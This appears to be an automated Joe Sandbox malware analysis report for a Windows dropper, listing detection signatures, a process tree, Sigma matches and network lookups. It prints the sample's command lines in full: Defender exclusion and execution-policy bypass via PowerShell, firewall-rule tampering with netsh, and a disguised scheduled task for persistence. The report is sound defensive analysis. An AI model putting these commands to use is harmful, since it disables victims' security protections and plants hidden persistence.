Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Analysis ID:1545319
MD5:a9a01bcaf4ffeddb26fd9fc79f0b57c4
SHA1:becb33e475352ad604ea851038cec53d2d15b047
SHA256:64be2f3a38522ca4b5f4d7887cd5832363f00d1a07b8bb531424bf6e81939fce
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops executable to a common third party application directory
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
PE file has nameless sections
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe" MD5: A9A01BCAF4FFEDDB26FD9FC79F0B57C4)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6176 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 7156 cmdline: "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4408 cmdline: schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 928 cmdline: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7096 cmdline: schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • MicrosoftEdgeUpdate.exe (PID: 280 cmdline: "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe" MD5: 962DB502E0DB073CAEB3A49FC7007776)
      • iexplore.exe (PID: 5500 cmdline: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 9B4B06703C314B8BD494570F443A74AE)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • iexplore.exe (PID: 6256 cmdline: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 9B4B06703C314B8BD494570F443A74AE)
      • WerFault.exe (PID: 5480 cmdline: C:\Windows\system32\WerFault.exe -u -p 280 -s 1376 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Bound.exe (PID: 5180 cmdline: "C:\ProgramData\Microsoft\Bound.exe" MD5: A1F8A5C21AFC60D046C9075E41BB36A4)
      • powershell.exe (PID: 4308 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3900 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 6376 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2688 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 736 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5184 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 5900 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3352 cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 3588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1208 cmdline: ping 127.0.0.1 -n 2 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, ProcessId: 928, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f, ProcessId: 928, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ParentProcessId: 6764, ParentProcessName: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, ProcessCommandLine: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'", ProcessId: 6176, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeAvira: detected
Antivirus detection for dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeAvira: detection malicious, Label: TR/AVI.Agent.rrfxm
Source: C:\ProgramData\Microsoft\Bound.exeAvira: detection malicious, Label: TR/AVI.Agent.lvnlf
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Microsoft\Bound.exeReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeReversingLabs: Detection: 58%
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeReversingLabs: Detection: 62%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\Microsoft\Bound.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeJoe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: _hashlib.pyd.15.dr
Source: Binary string: MlcrosoftEdgeUpdate.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\Windows\MlcrosoftEdgeUpdate.pdbpdbate.pdbw source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.15.dr
Source: Binary string: System.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\codes\bound\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmp, Bound.exe, 00000012.00000000.1960600687.00000212527C2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb3 source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb3 source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: System.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: System.Core.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb3 source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\select.pdb source: select.pyd.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: _elementtree.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.pdb source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.15.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb.-H- :-_CorExeMainmscoree.dll source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: mscorlib.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: _ctypes.pyd.15.dr
Source: Binary string: System.Core.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: C:\ProgramData\Microsoft\Bound.exeCode function: 4x nop then jmp 00007FFD9BAD0CCBh18_2_00007FFD9BAD0488
Source: C:\ProgramData\Microsoft\Bound.exeCode function: 4x nop then jmp 00007FFD9BAD0CCBh18_2_00007FFD9BAD0AAD
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: C:\Windows\System32\conhost.exe

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: unknownDNS traffic detected: query: nt89s.kro.kr replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nt89.kro.kr replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: nt89s.kro.kr
Source: global trafficDNS traffic detected: DNS query: nt89.kro.kr
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: cv2.pyd.15.drString found in binary or memory: http://caffe.berkeleyvision.org
Source: cv2.pyd.15.drString found in binary or memory: http://caffe.berkeleyvision.org/)
Source: cv2.pyd.15.drString found in binary or memory: http://campar.in.tum.de/Chair/HandEyeCalibration).
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 0000001E.00000002.2218905322.0000019EDE230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: cv2.pyd.15.drString found in binary or memory: http://homepages.inf.ed.ac.uk/rbf/HIPR2/hough.htm
Source: powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
